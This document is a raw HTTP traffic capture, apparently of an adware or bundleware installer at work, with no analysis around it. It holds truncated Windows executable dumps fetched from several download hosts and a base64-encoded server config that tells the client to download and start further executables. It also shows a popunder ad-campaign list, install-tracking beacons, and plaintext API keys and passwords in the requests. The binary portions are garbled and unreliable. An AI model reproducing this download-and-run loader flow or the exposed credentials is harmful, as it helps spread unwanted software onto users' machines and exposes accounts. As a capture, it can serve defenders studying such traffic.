".......*.0...........~..... ..*".(.....*Vs....(....t.........*...0..3
........(.......o......s......o......o......o........ ...*".(.....*.0.
.J..............,..r9..ps....z.( .....o!..........,..rg..ps....z......
..%...o"...&*...0..q........ ..... V... 9...o#......r...p.(#...($.....
,....r...p.(#...(....&....X..r...p(%.........-....X.........-.... ...*
....0........... ..... b... E...o#......r...p.(#...($.....,!...r...p.(
#...(&....Y('...(....&....X..r...p(%.........-....X.. ..........-.... 
...*....0............s(.......o).....o*.... ..*.0............( .....(,
....o-...s..... o/....s0...%.o1....%.o2.......(,....o-...o3.....s4....
.....s5.......i.2.............io6.......o.......o.....(7........o8...r
 ..p(9...o:..... ...*.0..~.......r/..p.....ri..p.....r...p.....r..
<<< skipped >>>

GET /download/3/wizzcaster.exe HTTP/1.1


Host: dl.wizzuniquify.com


HTTP/1.1 200 OK
Date: Mon, 20 Jun 2016 14:06:07 GMT
Server: Apache/2.4.10 (Debian)
Cache-Control: no-cache
Transfer-Encoding: chunked
Content-Type: application/x-msdownload
5a400..MZ......................@......................................
.........!..L.!This program cannot be run in DOS mode....$.......PE..L
...t.gW................................. ........@.. .................
[email protected]............
......................................................................
.. ............... ..H............text........ ...................... 
..`.rsrc...............................@[email protected].....................
[email protected];...........8...F...
........................................(i...*.&.(......*...0..9......
..~.........,".r...p.....(....o....s............~..... ..*....0.......
....~..... ..*.".......*....0...........~..... ..*.".(.....*...Vs....(
....t.........*..^.(........}......}....*.0............{....(....t....
.s......{.......o......rA..po......rK..po........ijo......o...........
..io..........,...o.......o....t........o....s....o.......... ...*....
.....R..c......".(.....*....0...........(.....s......o.....*.....(....
~....%-.&~..........s....%.....o.....*....s.........*".(.....*....0...
.........o......o....r...po........,.........%..,.o.........s....( ...
r...p(!....(".....o#.............. #...........o........,...........X.
......i2..........,.... A...o$........o%..... .............io&...&..('
.........,...o........*..........*........0..z......... . ...%.1...((.
..}........ ...%.2...((...}.....(......s).......{.....{....o*...}.....
..{.....{....o ...}.....s,...}....*...0...........s).....o-.....o.
<<< skipped >>>

GET /download/3/wizzcasterUninstaller.exe HTTP/1.1


Host: dl.wizzuniquify.com


HTTP/1.1 200 OK
Date: Mon, 20 Jun 2016 14:06:08 GMT
Server: Apache/2.4.10 (Debian)
Cache-Control: no-cache
Transfer-Encoding: chunked
Content-Type: application/x-msdownload
1fc00..MZ......................@......................................
.........!..L.!This program cannot be run in DOS mode....$.......PE..L
...L.gW.........."...0.................. ... ....@.. .................
......`[email protected].... .......
................@.....................................................
.. ............... ..H............text........ ...................... 
..`.rsrc........ ......................@[email protected].......@.............
[email protected]........$...............:.......
........................................0..!.........(.........~.....(
.............*...................&.(......*...0..9........~.........,"
.r...p.....(....o....s............~..... ..*....0...........~..... ..*
".......*.0...........~..... ..*".(.....*Vs....(....t.........*...0..3
........(.......o......s......o......o......o ....... ...*".(.....*.0.
.J..............,..r9..ps!...z.(".....o#..........,..rg..ps!...z......
..%...o$...&*...0..q........ ..... V... 9...o%......r...p.(%...(&.....
,....r...p.(%...(....&....X..r...p('.........-....X.........-.... ...*
....0........... ..... b... E...o%......r...p.(%...(&.....,!...r...p.(
%...((....Y()...(....&....X..r...p('.........-....X.. ..........-.... 
...*....0............s*.......o .....o,.... ..*.0............(-.....(.
....o/...s0.... o1....s2...%.o3....%.o4.......(.....o/...o5.....s6....
.....s7.......i.5.............io8.......o ......o ....(9........o:...r
 ..p(;...o<..... ...*.0..~.......r/..p.....ri..p.....r...p.....
<<< skipped >>>


GET /download/3/WizzCasterInstaller.exe HTTP/1.1
Host: dl.we-want-it.xyz
Connection: Keep-Alive


HTTP/1.1 200 OK
Date: Mon, 20 Jun 2016 14:05:50 GMT
Server: Apache/2.4.10 (Debian)
Cache-Control: no-cache
Keep-Alive: timeout=10, max=100
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: application/x-msdownload
1ae00..MZ......................@......................................
.........!..L.!This program cannot be run in DOS mode....$.......PE..L
...K.gW.........."...0.................. ........@.. .................
[email protected]............
.......................L..............................................
.. ............... ..H............text........ ...................... 
..`.rsrc...............................@[email protected].....................
[email protected]........$...............:...v...
........................................0..!.........(.........~.....(
.............*...................&.(......*...0..9........~.........,"
.r...p.....(....o....s............~..... ..*....0...........~..... ..*
".......*.0...........~..... ..*".(.....*Vs....(....t.........*...0..3
........(.......o......s......o......o......o ....... ...*".(.....*.0.
.J..............,..r9..ps!...z.(".....o#..........,..rg..ps!...z......
..%...o$...&*...0..q........ ..... V... 9...o%......r...p.(%...(&.....
,....r...p.(%...(....&....X..r...p('.........-....X.........-.... ...*
....0........... ..... b... E...o%......r...p.(%...(&.....,!...r...p.(
%...((....Y()...(....&....X..r...p('.........-....X.. ..........-.... 
...*....0............s*.......o .....o,.... ..*.0............(-.....(.
....o/...s0.... o1....s2...%.o3....%.o4.......(.....o/...o5.....s6....
.....s7.......i.5.............io8.......o ......o ....(9........o:...r
 ..p(;...o<..... ...*.0..~.......r/..p.....ri..p.....r...p.....
<<< skipped >>>

GET /download/1/wizzrelease.exe HTTP/1.1


Host: dl.we-want-it.xyz


HTTP/1.1 200 OK
Date: Mon, 20 Jun 2016 14:05:52 GMT
Server: Apache/2.4.10 (Debian)
Cache-Control: no-cache
Transfer-Encoding: chunked
Content-Type: application/x-msdownload
228c00..MZ......................@.....................................
..........!..L.!This program cannot be run in DOS mode....$.......PE..
L...A.gW.........."...0..r"...........".. ...."...@.. ................
........"...........@.................................`.".O.....".....
..................".....(."...........................................
... ............... ..H............text....q".. ...r".................
 ..`.rsrc........."......t".............@[email protected]........"......."...
[email protected]..................".....H........$...............9...V".
.........................................0..!.........(.........~.....
(.............*...................&.(......*...0..9........~.........,
".r...p.....(....o....s............~..... ..*....0...........~..... ..
*".......*.0...........~..... ..*".(.....*Vs....(....t.........*...0..
3........(.......o......s......o......o......o........ ...*".(.....*.0
..J..............,..r9..ps....z.( .....o!..........,..rg..ps....z.....
...%...o"...&*...0..q........ ..... V... 9...o#......r...p.(#...($....
.,....r...p.(#...(....&....X..r...p(%.........-....X.........-.... ...
*....0........... ..... b... E...o#......r...p.(#...($.....,!...r...p.
(#...(&....Y('...(....&....X..r...p(%.........-....X.. ..........-....
 ...*....0............s(.......o).....o*.... ..*.0............( .....(
,....o-...s..... o/....s0...%.o1....%.o2.......(,....o-...o3.....s4...
......s5.......i.2.............io6.......o.......o.....(7........o8...
r ..p(9...o:..... ...*.0..~.......r/..p.....ri..p.....r...p.....r.
<<< skipped >>>


POST /remotes_xml_sections.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: VVV.csdimonetize.com
Content-Length: 142
Expect: 100-continue
Connection: Keep-Alive


HTTP/1.1 100 Continue
....




remote_id=3&user_name=csdi&api_key=azaez-azezae-azeaze-azeaze&buying_p
roduct_name=spacesoundpro&buying_partner_name=CMI3&buying_channel_name
=3

HTTP/1.1 200 OK


Date: Mon, 20 Jun 2016 14:05:40 GMT
Server: Apache/2.4.10 (Debian)
Set-Cookie: PHPSESSID=lc72qogqtu04pvn1dav4ivpp03; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 1108
Keep-Alive: timeout=10, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
PHVwZGF0ZXMgcmVmcmVzaD0iNjAiPgoKPHRhc2s DQoNCjxwZXJmb3JtPg0KDQo8ZG93bm
xvYWQgbmFtZT0id2luIiB2YWx1ZT0iaHR0cDovL2RsLndlLXdhbnQtaXQueHl6L2Rvd25s
b2FkLzMvV2l6ekNhc3Rlckluc3RhbGxlci5leGUiIHZlcnNpb249IiIgIHNvZnR3YXJlPS
IiIC8 DQo8cHJvY2VzcyB0eXBlPSJzdGFydCIgbmFtZT0id2luIiB2YWx1ZT0id2FpdCIg
cGFyYW1zPSIgY3NkaSIvPg0KPG1vZCB0eXBlPSJhZGQiIG5hbWU9InBvcF9tb2R1bGUiIH
ZhbHVlPSJ3aXp6Y2FzdGVyX3NpbmNlXzIwMTYwNTEwIi8 DQoNCjwvcGVyZm9ybT4NCg0K
PGNvbmRpdGlvbnM DQoNCjxtb2QgdHlwZT0iY2hlY2siIG5hbWU9InBvcF9tb2R1bGUiIH
ZhbHVlPSJ3aXp6Y2FzdGVyX3NpbmNlXzIwMTYwNTEwIiBtYXRjaD0iZmFsc2UiLz4NCg0K
PC9jb25kaXRpb25zPg0KDQo8L3Rhc2s PHRhc2s DQoNCjxwZXJmb3JtPg0KDQo8ZG93bm
xvYWQgbmFtZT0idGVzdHZlcnNpb24iIHZhbHVlPSJodHRwOi8vZGwud2Utd2FudC1pdC54
eXovZG93bmxvYWQvMS93aXp6cmVsZWFzZS5leGUiIHZlcnNpb249IiIgIHNvZnR3YXJlPS
IiIC8 DQo8cHJvY2VzcyB0eXBlPSJzdGFydCIgbmFtZT0idGVzdHZlcnNpb24iIHZhbHVl
PSJ3YWl0IiBwYXJhbXM9IiAiLz4NCjxtb2QgdHlwZT0iYWRkIiBuYW1lPSJtYWppIiB2YW
x1ZT0iYWFxbSIvPg0KDQo8L3BlcmZvcm0 DQoNCjxjb25kaXRpb25zPg0KDQo8bW9kIHR5
cGU9ImNoZWNrIiBuYW1lPSJtYWppIiB2YWx1ZT0iYWFxbSIgbWF0Y2g9ImZhbHNlIi8 DQ
oNCjwvY29uZGl0aW9ucz4NCg0KPC90YXNrPg0KCjwvdXBkYXRlcz4KCgo=..



GET /YXRpeGJidWV0Y29tZ29jcG14eXh4amFmZmp6dWJ4bWl7InNpZCI6IjYyNjIiLCJjb21wYW5pZXMiOnsiMTg0MSI6WzFdfSwic3ViX2lkIjoiMCIsInNpbGVudCI6IjEiLCJ2ZXIiOiIxIiwicm5kMCI6IjI0NjE0ODYxYjUxMzEzZjc3MmI1ODUyOGMzNmMzMGU1In0 HTTP/1.1
User-Agent: NSIS_Inetc (Mozilla)
Host: itan.etudios.ru
Connection: Keep-Alive
Cache-Control: no-cache


HTTP/1.1 200 OK
Server: nginx/1.4.2
Date: Mon, 20 Jun 2016 14:06:10 GMT
Content-Type: application/octet-stream; charset=windows-1251
Content-Length: 5610496
Connection: keep-alive
X-Powered-By: PHP/5.4.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Mon, 20 Jun 2016 14:06:10 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Disposition: attachment; filename="1b2833e4311d.exe"
Content-Transfer-Encoding: binary
Pragma: public
MZP.....................@.............................................
..!..L.!..This program must be run under Win32..$7....................
......................................................................
..............................................PE..L.....fW............
..........&...................@..........................`V...........
[email protected].`;....U.......................P.
@.............................P......................zP.......P.p.....
...............text...Xx.......z.................. ..`.itext..."......
.$...~.............. ..`[email protected]..
...\....P..........................idata..`;...pP..<....O..........
[email protected]......([email protected]
.............@[email protected][email protected]..]....
.P......6P.............@[email protected][email protected][email protected]
rc.........U.......T.............@..@[email protected]..........
...@..@[email protected]..........
[email protected][email protected][email protected].......
[email protected][email protected][email protected]
[email protected][email protected]................@..
[email protected][email protected]................
[email protected][email protected].@..
[email protected][email protected][email protected]
[email protected][email protected][email protected].....@..
<<< skipped >>>


POST /api/v1/configuration?username=csdi&password=68b07047-1e8d-47ef-8332-09a2c83ad539 HTTP/1.1
Content-Type: text/xml
Host: wizzcaster.com
Content-Length: 0
Connection: Keep-Alive


HTTP/1.1 200 OK
Date: Mon, 20 Jun 2016 14:06:02 GMT
Server: Apache/2.4.10 (Debian)
Cache-Control: no-cache
Set-Cookie: laravel_session=eyJpdiI6IjJwcjdXV0VBWFp1ellvSjA1R2NiTHc9PSIsInZhbHVlIjoiUVwvaFNzSG9FNDJZSkRMdzRKR3BKME9VT2ZlTWNrYU5lUGt4MUMzNTE1eWo3XC85XC9kNnMxYzlwSURvenRtSzNwZWNLR2p6dzV4VHNIc3hPVWdTckNcL3BnPT0iLCJtYWMiOiJhZmUyYmFjMzIwN2QxOTJmYWM3Zjc3YjRmNDJkYzg4Y2U4ZTU2MjJiNTczM2Q4ODM2OTFmMGFkOThkNDhkMDNkIn0=; expires=Mon, 20-Jun-2016 16:06:02 GMT; Max-Age=7200; path=/; httponly
Content-Length: 135
Keep-Alive: timeout=10, max=100
Connection: Keep-Alive
Content-Type: application/json
{"username":"csdi","api_key":"56f25c2b4eced","wizztracki_user_name":"c
sdi","wizztracki_api_key":"e3b93cef-8bd4-11e5-8538-0cc47a47968c"}t>....


POST /api/v2/ads?user_name=csdi&api_key=56f25c2b4eced&days_after_install=0 HTTP/1.1


Content-Type: text/xml
Host: wizzcaster.com
Content-Length: 0


HTTP/1.1 200 OK
Date: Mon, 20 Jun 2016 14:06:02 GMT
Server: Apache/2.4.10 (Debian)
Cache-Control: no-cache
Set-Cookie: laravel_session=eyJpdiI6IklxMVwvQzlRQlwvcGJCU3JIaUhtdzhJdz09IiwidmFsdWUiOiJ2VFZ6XC9mVkozcWZvY3EyRVA0Ylo0UG02THg1b2V2MGk1b2wxeHA0ekJrMnU3TzZqK2RITnVwekV0ZmZTU0ZMUWc4MXJXZ2EwTndzcHhUcUxNYktHUGc9PSIsIm1hYyI6IjViNDcyM2FkNjNhMzgzMjVjOTgwYmJjNDZhOTc2NDE4NDEyYTg0ZTMxY2YxNzk1MTI1N2MyNGI4NzQyZDQ4MzQifQ==; expires=Mon, 20-Jun-2016 16:06:02 GMT; Max-Age=7200; path=/; httponly
Content-Length: 1210
Content-Type: application/json
{"time_between_prints":"10","print_list":[{"link":"http:\/\/VVV.adnetw
orkperformance.com\/a\/display.php?r=1203893","campaign_id":"67","camp
aign_config_id":"404","max_show_per_day_per_user":"30","max_show_per_d
ay_total":"2147483647","ie":"1","chrome":"1","firefox":"1","start_time
":"00:00:00","end_time":"00:00:00"},{"link":"http:\/\/VVV.terraclicks.
com\/watch?key=ce879c0c81171a2b08325be280eca96a","campaign_id":"120","
campaign_config_id":"402","max_show_per_day_per_user":"30","max_show_p
er_day_total":"2147483647","ie":"1","chrome":"1","firefox":"1","start_
time":"00:00:00","end_time":"00:00:00"},{"link":"http:\/\/VVV.xmediase
rve.com\/apu.php?n=&zoneid=14335&cb=INSERT_RANDOM_NUMBER_HERE&popunder
=1&direct=1","campaign_id":"68","campaign_config_id":"403","max_show_p
er_day_per_user":"30","max_show_per_day_total":"2147483647","ie":"1","
chrome":"1","firefox":"1","start_time":"00:00:00","end_time":"00:00:00
"},{"link":"http:\/\/n162adserv.com\/ads?key=0a36c0d49f7b6df6a133b2276
2c71970&ch=&width=0&height=0","campaign_id":"65","campaign_config_id":
"382","max_show_per_day_per_user":"8","max_show_per_day_total":"214748
3647","ie":"1","chrome":"1","firefox":"1","start_time":"00:00:00","end
_time":"00:00:00"}]}..
<<< skipped >>>


GET /protJS/LDpxFBktGQEVFCwCBhAHSl5XREYHCxMNCQZGXEomBRABLQ8wDSQqOgEqLB4jCUVfRBIWCkpeRAAQEhhdS0kBChINFQgBGm8MEgUqOzoNBWwIEUkjHBUMBRZGFA4YWxMcCjsVBxEUCwJbVVhyUkBafXJxSEkhFg0FDDoCRV5SX1RVWlBSWlJcX1kZ HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/x-ms-application, application/x-ms-xbap, application/vnd.ms-xpsdocument, application/xaml xml, */*
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: latest-404417.onpato.ru
Connection: Keep-Alive


HTTP/1.1 204 No Content
Server: nginx/1.8.1
Date: Mon, 20 Jun 2016 14:05:42 GMT
Content-Type: application/javascript
Connection: keep-alive
HTTP/1.1 204 No Content..Server: nginx/1.8.1..Date: Mon, 20 Jun 2016 1
4:05:42 GMT..Content-Type: application/javascript..Connection: keep-al
ive..



GET /8001/ttwifi.exe HTTP/1.1
User-Agent: NSIS_Inetc (Mozilla)
Host: down.eszju.cn
Connection: Keep-Alive
Cache-Control: no-cache


HTTP/1.1 200 OK
Content-Type: application/octet-stream
Last-Modified: Sat, 04 Jun 2016 05:36:25 GMT
Accept-Ranges: bytes
ETag: "a8c1c6823bed11:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Mon, 20 Jun 2016 14:05:55 GMT
Content-Length: 1404030
MZP.....................@.............................................
..!..L.!..This program must be run under Win32..$7....................
......................................................................
..............................................PE..L....^B*............
.........F....................@..........................@............
[email protected]........,......................
......................................................................
..............CODE....8........................... ..`DATA....L.......
....................@...BSS.....P................................idata
[email protected]................................
[email protected]....................
[email protected]....,.......,[email protected].............@..
[email protected]..............................................
......................................................................
..............................................string................&l
t;[email protected].@..........)@..(@..(@..(@......(@..Free...)@..InitInstance.
. )@..CleanupInstance..<(@..ClassType..@(@..ClassName..T(@..ClassNa
meIs..|(@..ClassParent...)@..ClassInfo...(@..InstanceSize...)@..Inheri
tsFrom...)@..Dispatch...)@..MethodAddress...*@..MethodName..L*@..Field
Address...)@..DefaultHandler...(@..NewInstance...(@..FreeInstance.TObj
ect.@...@..% .@....%..@....%..@....%..@....%..@....%..@....%..@....%(.
@....%..@....%..@....%..@....%..@....%..@....%..@....%..@....%..@.
<<< skipped >>>


POST /csdi/wizzmonetize/buying_installer_spacesoundpro_CMI3_3_start HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: agent.wizztrakys.com
Content-Length: 59
Expect: 100-continue
Connection: Keep-Alive


HTTP/1.1 100 Continue
....




user_name=csdi&api_key=e3b93cef-8bd4-11e5-8538-0cc47a47968c

HTTP/1.1 200 OK


Date: Mon, 20 Jun 2016 14:05:47 GMT
Server: Apache/2.4.10 (Debian)
Set-Cookie: PHPSESSID=ubup3l5n78v72v1v1kv1ltqsj0; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Access-Control-Allow-Origin: *
Content-Length: 29
Keep-Alive: timeout=10, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
{"message":"Track was added"}....


POST /csdi/wizzmonetize/buying_installer_spacesoundpro_CMI3_3_wizzproduct_download_start HTTP/1.1


Content-Type: application/x-www-form-urlencoded
Host: agent.wizztrakys.com
Content-Length: 59
Expect: 100-continue


HTTP/1.1 100 Continue
....




user_name=csdi&api_key=e3b93cef-8bd4-11e5-8538-0cc47a47968c

HTTP/1.1 200 OK


Date: Mon, 20 Jun 2016 14:05:48 GMT
Server: Apache/2.4.10 (Debian)
Set-Cookie: PHPSESSID=ho6r24d5jd50rcrl43ap54bfe0; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Access-Control-Allow-Origin: *
Content-Length: 29
Content-Type: text/html; charset=UTF-8
{"message":"Track was added"}HTTP/1.1 200 OK..Date: Mon, 20 Jun 2016 1
4:05:48 GMT..Server: Apache/2.4.10 (Debian)..Set-Cookie: PHPSESSID=ho6
r24d5jd50rcrl43ap54bfe0; path=/..Expires: Thu, 19 Nov 1981 08:52:00 GM
T..Cache-Control: no-store, no-cache, must-revalidate, post-check=0, p
re-check=0..Pragma: no-cache..Access-Control-Allow-Origin: *..Content-
Length: 29..Content-Type: text/html; charset=UTF-8..{"message":"Track 
was added"}....


POST /csdi/wizzmonetize/buying_installer_spacesoundpro_CMI3_3_wizzproduct_download_succeed HTTP/1.1


Content-Type: application/x-www-form-urlencoded
Host: agent.wizztrakys.com
Content-Length: 59
Expect: 100-continue


HTTP/1.1 100 Continue
....




user_name=csdi&api_key=e3b93cef-8bd4-11e5-8538-0cc47a47968c

HTTP/1.1 200 OK


Date: Mon, 20 Jun 2016 14:05:48 GMT
Server: Apache/2.4.10 (Debian)
Set-Cookie: PHPSESSID=2q3l3cuap30jvhrtlc2t259q45; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Access-Control-Allow-Origin: *
Content-Length: 29
Content-Type: text/html; charset=UTF-8
{"message":"Track was added"}HTTP/1.1 200 OK..Date: Mon, 20 Jun 2016 1
4:05:48 GMT..Server: Apache/2.4.10 (Debian)..Set-Cookie: PHPSESSID=2q3
l3cuap30jvhrtlc2t259q45; path=/..Expires: Thu, 19 Nov 1981 08:52:00 GM
T..Cache-Control: no-store, no-cache, must-revalidate, post-check=0, p
re-check=0..Pragma: no-cache..Access-Control-Allow-Origin: *..Content-
Length: 29..Content-Type: text/html; charset=UTF-8..{"message":"Track 
was added"}....


POST /csdi/wizzmonetize/buying_installer_spacesoundpro_CMI3_3_wizzproduct_execute_succeed HTTP/1.1


Content-Type: application/x-www-form-urlencoded
Host: agent.wizztrakys.com
Content-Length: 59
Expect: 100-continue


HTTP/1.1 100 Continue
....




user_name=csdi&api_key=e3b93cef-8bd4-11e5-8538-0cc47a47968c

HTTP/1.1 200 OK


Date: Mon, 20 Jun 2016 14:05:48 GMT
Server: Apache/2.4.10 (Debian)
Set-Cookie: PHPSESSID=n46as2mgr80o05ed0ja2a69k63; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Access-Control-Allow-Origin: *
Content-Length: 29
Content-Type: text/html; charset=UTF-8
{"message":"Track was added"}....


POST /csdi/wizzmonetize/buying_installer_spacesoundpro_CMI3_3_product_download_start HTTP/1.1


Content-Type: application/x-www-form-urlencoded
Host: agent.wizztrakys.com
Content-Length: 59
Expect: 100-continue


HTTP/1.1 100 Continue
....




user_name=csdi&api_key=e3b93cef-8bd4-11e5-8538-0cc47a47968c

HTTP/1.1 200 OK


Date: Mon, 20 Jun 2016 14:05:48 GMT
Server: Apache/2.4.10 (Debian)
Set-Cookie: PHPSESSID=rljbm550hphee7e79a7efque27; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Access-Control-Allow-Origin: *
Content-Length: 29
Content-Type: text/html; charset=UTF-8
{"message":"Track was added"}HTTP/1.1 200 OK..Date: Mon, 20 Jun 2016 1
4:05:48 GMT..Server: Apache/2.4.10 (Debian)..Set-Cookie: PHPSESSID=rlj
bm550hphee7e79a7efque27; path=/..Expires: Thu, 19 Nov 1981 08:52:00 GM
T..Cache-Control: no-store, no-cache, must-revalidate, post-check=0, p
re-check=0..Pragma: no-cache..Access-Control-Allow-Origin: *..Content-
Length: 29..Content-Type: text/html; charset=UTF-8..{"message":"Track 
was added"}....


POST /csdi/wizzmonetize/buying_installer_spacesoundpro_CMI3_3_product_download_succeed HTTP/1.1


Content-Type: application/x-www-form-urlencoded
Host: agent.wizztrakys.com
Content-Length: 59
Expect: 100-continue


HTTP/1.1 100 Continue
....




user_name=csdi&api_key=e3b93cef-8bd4-11e5-8538-0cc47a47968c

HTTP/1.1 200 OK


Date: Mon, 20 Jun 2016 14:05:53 GMT
Server: Apache/2.4.10 (Debian)
Set-Cookie: PHPSESSID=42giikqt1lhht9v6t61govequ5; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Access-Control-Allow-Origin: *
Content-Length: 29
Content-Type: text/html; charset=UTF-8
{"message":"Track was added"}HTTP/1.1 200 OK..Date: Mon, 20 Jun 2016 1
4:05:53 GMT..Server: Apache/2.4.10 (Debian)..Set-Cookie: PHPSESSID=42g
iikqt1lhht9v6t61govequ5; path=/..Expires: Thu, 19 Nov 1981 08:52:00 GM
T..Cache-Control: no-store, no-cache, must-revalidate, post-check=0, p
re-check=0..Pragma: no-cache..Access-Control-Allow-Origin: *..Content-
Length: 29..Content-Type: text/html; charset=UTF-8..{"message":"Track 
was added"}....


POST /csdi/wizzmonetize/buying_installer_spacesoundpro_CMI3_3_product_execute_succeed HTTP/1.1


Content-Type: application/x-www-form-urlencoded
Host: agent.wizztrakys.com
Content-Length: 59
Expect: 100-continue


HTTP/1.1 100 Continue
....




user_name=csdi&api_key=e3b93cef-8bd4-11e5-8538-0cc47a47968c

HTTP/1.1 200 OK


Date: Mon, 20 Jun 2016 14:05:54 GMT
Server: Apache/2.4.10 (Debian)
Set-Cookie: PHPSESSID=70eh31qvtoss83boseru1g1gl7; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Access-Control-Allow-Origin: *
Content-Length: 29
Content-Type: text/html; charset=UTF-8
{"message":"Track was added"}....


POST /csdi/wizzmonetize/buying_installer_spacesoundpro_CMI3_3_wizzuninstaller_download_start HTTP/1.1


Content-Type: application/x-www-form-urlencoded
Host: agent.wizztrakys.com
Content-Length: 59
Expect: 100-continue


HTTP/1.1 100 Continue
....




user_name=csdi&api_key=e3b93cef-8bd4-11e5-8538-0cc47a47968c

HTTP/1.1 200 OK


Date: Mon, 20 Jun 2016 14:05:54 GMT
Server: Apache/2.4.10 (Debian)
Set-Cookie: PHPSESSID=tmg9hnioa70a8kncrmp9o2os90; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Access-Control-Allow-Origin: *
Content-Length: 29
Content-Type: text/html; charset=UTF-8
{"message":"Track was added"}HTTP/1.1 200 OK..Date: Mon, 20 Jun 2016 1
4:05:54 GMT..Server: Apache/2.4.10 (Debian)..Set-Cookie: PHPSESSID=tmg
9hnioa70a8kncrmp9o2os90; path=/..Expires: Thu, 19 Nov 1981 08:52:00 GM
T..Cache-Control: no-store, no-cache, must-revalidate, post-check=0, p
re-check=0..Pragma: no-cache..Access-Control-Allow-Origin: *..Content-
Length: 29..Content-Type: text/html; charset=UTF-8..{"message":"Track 
was added"}....


POST /csdi/wizzmonetize/buying_installer_spacesoundpro_CMI3_3_wizzuninstaller_download_succeed HTTP/1.1


Content-Type: application/x-www-form-urlencoded
Host: agent.wizztrakys.com
Content-Length: 59
Expect: 100-continue


HTTP/1.1 100 Continue
....




user_name=csdi&api_key=e3b93cef-8bd4-11e5-8538-0cc47a47968c

HTTP/1.1 200 OK


Date: Mon, 20 Jun 2016 14:05:55 GMT
Server: Apache/2.4.10 (Debian)
Set-Cookie: PHPSESSID=g62khqtgl3rs6v5qt1jrp0rpi0; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Access-Control-Allow-Origin: *
Content-Length: 29
Content-Type: text/html; charset=UTF-8
{"message":"Track was added"}HTTP/1.1 200 OK..Date: Mon, 20 Jun 2016 1
4:05:55 GMT..Server: Apache/2.4.10 (Debian)..Set-Cookie: PHPSESSID=g62
khqtgl3rs6v5qt1jrp0rpi0; path=/..Expires: Thu, 19 Nov 1981 08:52:00 GM
T..Cache-Control: no-store, no-cache, must-revalidate, post-check=0, p
re-check=0..Pragma: no-cache..Access-Control-Allow-Origin: *..Content-
Length: 29..Content-Type: text/html; charset=UTF-8..{"message":"Track 
was added"}....


POST /csdi/wizzmonetize/buying_installer_spacesoundpro_CMI3_3_done HTTP/1.1


Content-Type: application/x-www-form-urlencoded
Host: agent.wizztrakys.com
Content-Length: 59
Expect: 100-continue


HTTP/1.1 100 Continue
....




user_name=csdi&api_key=e3b93cef-8bd4-11e5-8538-0cc47a47968c

HTTP/1.1 200 OK


Date: Mon, 20 Jun 2016 14:05:58 GMT
Server: Apache/2.4.10 (Debian)
Set-Cookie: PHPSESSID=rftfb4vvdcmhmkmk47h1sf1no0; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Access-Control-Allow-Origin: *
Content-Length: 29
Content-Type: text/html; charset=UTF-8
{"message":"Track was added"}HTTP/1.1 200 OK..Date: Mon, 20 Jun 2016 1
4:05:58 GMT..Server: Apache/2.4.10 (Debian)..Set-Cookie: PHPSESSID=rft
fb4vvdcmhmkmk47h1sf1no0; path=/..Expires: Thu, 19 Nov 1981 08:52:00 GM
T..Cache-Control: no-store, no-cache, must-revalidate, post-check=0, p
re-check=0..Pragma: no-cache..Access-Control-Allow-Origin: *..Content-
Length: 29..Content-Type: text/html; charset=UTF-8..{"message":"Track 
was added"}..



GET /Generic/zgm.php?sid=8100001 HTTP/1.1
User-Agent: NSIS_Inetc (Mozilla)
Host: software-repository.com
Connection: Keep-Alive
Cache-Control: no-cache


HTTP/1.1 200 OK
Server: nginx/1.8.0
Date: Mon, 20 Jun 2016 14:06:26 GMT
Content-Type: application/octet-stream
Content-Length: 244224
Connection: keep-alive
X-Powered-By: PHP/5.5.32
Content-Transfer-Encoding: binary
Content-Disposition: attachment; filename=gXvDHtyh.exe
MZ......................@.............................................
..!..L.!This program cannot be run in DOS mode....$........../S..|S..|
S..|<.&|G..|<..|j..|<..|...|Z.;|V..|Z. |^..|S..|:..|<..|Z.
.|<.%|R..|RichS..|........PE..L...e..W.............................
4............@.................................).....@................
.................lr...................................................
....................B..@............................................te
xt............................... ..`.rdata...........................
[email protected][email protected]............~.
.............@..`.rsrc...............................@[email protected]...*...
....,[email protected]...........................................
......................................................................
......................................................................
......................................................................
...........................................................U......U..M
.j..U..M...>...E......]..............U......U..M.j..U..M..g>...E
